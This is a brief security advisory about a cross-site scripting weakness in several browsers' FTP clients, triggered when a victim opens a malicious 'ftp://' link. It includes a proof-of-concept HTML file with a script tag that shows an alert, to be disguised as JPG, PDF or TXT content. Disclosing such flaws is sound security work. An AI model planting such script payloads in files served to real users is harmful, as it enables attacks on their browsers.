Multiple Vendor Web Browser FTP Client Cross Site Scripting Weakness

Multiple Vendor Web Browser FTP Client Cross Site Scripting Weakness

An attacker can exploit these issues by enticing an unsuspecting victim to follow a malicious 'ftp://' link.

The following content of a JPG, PDF, or TXT file is available as a proof of concept:

<html>
<body>
<script>alert('backdoored');</script>
</body>
</html>